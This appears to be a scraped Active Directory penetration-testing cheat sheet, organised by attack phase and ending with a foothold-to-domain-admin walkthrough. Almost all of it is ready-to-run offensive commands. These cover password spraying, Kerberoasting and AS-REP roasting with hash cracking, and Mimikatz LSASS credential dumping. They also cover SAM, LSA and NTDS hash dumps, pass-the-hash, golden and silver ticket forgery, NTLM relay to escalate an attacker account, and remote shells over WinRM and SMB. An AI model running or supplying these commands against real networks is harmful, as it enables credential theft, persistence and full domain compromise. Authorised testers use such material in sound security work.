Use it for: Scanning AD networks, checking creds, listing shares, Kerberoastable users, sessions, etc.
Syntax:

# Basic host discovery & SMB check
cme smb 10.10.10.0/24

# Check if creds work
cme smb 10.10.10.5 -u admin -p 'Pass123!'

# List shares
cme smb 10.10.10.5 -u user -p pass --shares

# Kerberoastable users
cme smb 10.10.10.5 -u user -p pass --kerberoast

Use it for: AS-REP roasting (pre-auth user discovery) and user enumeration.
Syntax:

# User enumeration (no creds needed)
kerbrute userenum --dc 10.10.10.5 -d domain.local users.txt

# AS-REP Roasting (users without pre-auth)
kerbrute asrep --dc 10.10.10.5 -d domain.local users.txt

Use it for: Dumping AS-REP roastable hashes.
Syntax:

GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.5 -no-pass

Use it for: Headless BloodHound collection without running a GUI.
Syntax:

bloodhound-python -u user -p pass -dc-ip 10.10.10.5 -d domain.local -c All

Use it for: Pulling user data, groups, and more over LDAP.
Syntax (ldapsearch):

ldapsearch -x -H ldap://10.10.10.5 -D "user@domain.local" -w 'pass' -b "DC=domain,DC=local"

Syntax (Impacket):

ldapdomaindump ldap://10.10.10.5 -u 'user' -p 'pass'

PHASE 2: Exploitation – Credential Attacks

Use it for: Cracking hashes (AS-REP, Kerberos, NTLM).
Example (AS-REP Roasting – mode 18200):

hashcat -m 18200 hash.txt rockyou.txt --force

Use it for: Kerberoasting – dumping service account TGS tickets.
Syntax:

GetUserSPNs.py domain.local/user:'pass' -dc-ip 10.10.10.5 -outputfile roast.txt

Use it for: Dumping credentials, forging tickets, pass-the-hash, etc.
Quick syntax:

# Dump creds from LSASS
privilege::debug
log mimikatz.log
sekurlsa::logonpasswords

# Pass-the-Hash
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<hash> /run:cmd.exe

# Silver Ticket
kerberos::golden /user:<svc> /domain:<domain> /sid:<domain SID> /rc4:<NTLM> /target:<SPN> /service:<SPN type> /ticket:<path>

# Inject ticket
kerberos::ptt ticket.kirbi

Use it for: Kerberoasting, AS-REP roasting, ticket harvesting, ticket forging.
Syntax:

# Kerberoast
Rubeus.exe kerberoast /user:svcaccount /format:hashcat

# AS-REP roast
Rubeus.exe asreproast

# Import ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Dump existing tickets
Rubeus.exe klist

PHASE 3: Post-Auth Enumeration & Escalation

Use it for: Enumerating users, groups, ACLs, sessions, SPNs, GPOs.
Syntax (PowerShell):

# Import script
Import-Module .\PowerView.ps1

# Enumerate domain users
Get-DomainUser

# Check local admin access
Invoke-CheckLocalAdminAccess

# Find unconstrained delegation
Get-DomainComputer -Unconstrained

Use it for: Gathering data for visual AD attack paths.
Syntax:

# In PowerShell
.\SharpHound.exe -c all -d domain.local -u user -p pass

# Upload JSON to BloodHound GUI

Use it for: Dumping NTLM hashes via SMB/RPC if you have SYSTEM access or relay.
Syntax:

secretsdump.py -hashes :<hash> domain.local/user@10.10.10.5

PHASE 4: Ticket Forgery & Persistence

Forge a domain-wide TGT using krbtgt hash.

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /id:500 /ticket:golden.kirbi
kerberos::ptt golden.kirbi

Target a single SPN, avoid domain controller traffic.

kerberos::golden /user:srvaccount /domain:domain.local /sid:S-1-5-21-... /rc4:<NTLM hash> /service:cifs /target:target.domain.local /ticket:silver.kirbi
kerberos::ptt silver.kirbi

Bonus: Relaying + Pivoting Tools

Use it for: Relaying SMB/HTTP auth to dump secrets or add users.
Syntax:

ntlmrelayx.py -t ldap://10.10.10.5 --escalate-user attacker

Use it for: Shell access if you have valid creds + WinRM is enabled.
Syntax:

evil-winrm -i 10.10.10.5 -u user -p pass

Use it for: Remote command execution with creds or hashes.
Syntax (from Impacket):

# psexec
psexec.py domain.local/user@10.10.10.5

# smbexec
smbexec.py domain.local/user@10.10.10.5

# wmiexec
wmiexec.py domain.local/user@10.10.10.5

Use it for: Visualizing privilege escalation and lateral movement paths.

  • Use SharpHound or BloodHound-python to collect data.
  • Import into GUI and analyze shortest paths (e.g., “Shortest Path to Domain Admin”).

CrackMapExec is one of the most powerful and versatile post-exploitation tools in the AD pentester’s toolkit. It’s used for enumeration, credential validation, exploitation, command execution, dumping hashes, spraying passwords, Kerberoasting, and more — all through SMB, WinRM, LDAP, MSSQL, and other protocols.

  • smb — Most commonly used for everything from spraying to dumping hashes.
  • winrm — Used for executing commands over WinRM if enabled.
  • ldap — Used for querying AD via LDAP.
  • mssql — Used for enumerating or exploiting SQL Server instances.
cme smb 10.10.10.0/24
cme smb 10.10.10.5 -u user -p pass
cme smb 10.10.10.5 -u user -H <NTLM hash>
cme smb 10.10.10.0/24 -u usernames.txt -p 'Summer2024' --no-bruteforce
cme smb 10.10.10.5 -u user -p pass --shares
cme smb 10.10.10.5 -u user -p pass --sessions
# Dump SAM database (local accounts)
cme smb 10.10.10.5 -u user -p pass --sam

# Dump LSA secrets
cme smb 10.10.10.5 -u user -p pass --lsa

# Dump NTDS hashes (domain creds)
cme smb 10.10.10.5 -u user -p pass --ntds
# Run commands via SMB
cme smb 10.10.10.5 -u user -p pass -x 'whoami'
cme smb 10.10.10.0/24 -u user -p pass --local-auth
cme smb 10.10.10.5 -u user -p pass --kerberoast
cme smb 10.10.10.5 -u user -H <NTLM hash> --shares

CME supports modular extensions. You can write your own or use community-built ones. Check available modules:

cme smb -L

To run a specific module:

cme smb 10.10.10.5 -u user -p pass -M <module> -o <options>

Examples:

# Run 'wdigest' module to check for plaintext creds
cme smb 10.10.10.5 -u user -p pass -M wdigest

# Run 'adcs' module to check for misconfigured ADCS
cme smb 10.10.10.5 -u user -p pass -M adcs

Here’s how these tools come together in a real-world pentest scenario from initial access to domain dominance.

Scenario: You’ve got a foothold on a Windows machine in a domain.

# Identify hosts and services
nmap -p 445,88,135,139,389,5985 10.10.10.0/24

# Use CrackMapExec to fingerprint hosts
cme smb 10.10.10.0/24
# Try Kerbrute userenum
kerbrute userenum --dc 10.10.10.5 -d domain.local users.txt
# Use GetNPUsers to pull AS-REP hashes
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.5 -no-pass
hashcat -m 18200 hash.txt rockyou.txt --force
# Check which machines the user has access to
cme smb 10.10.10.0/24 -u user -p pass

# Dump shares, look for juicy loot
cme smb <ip> -u user -p pass --shares
GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.5 -outputfile roast.txt
hashcat -m 13100 roast.txt rockyou.txt --force
# BloodHoundPython collection
bloodhound-python -u user -p pass -dc-ip 10.10.10.5 -d domain.local -c All

# Load into BloodHound GUI and find "Shortest Path to Domain Admin"
# Use valid hash or password with Evil-WinRM
evil-winrm -i <ip> -u user -p pass

# Or use CME with PTH
cme smb <ip> -u user -H <NTLM> -x 'whoami'
# If you’ve got SYSTEM access
secretsdump.py domain.local/user@target -hashes :<NTLM> -dc-ip 10.10.10.5
# Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ticket:golden.kirbi

# Silver Ticket
kerberos::golden /user:svc /rc4:<hash> /service:cifs /target:host.domain.local /ticket:silver.kirbi

Scroll to Top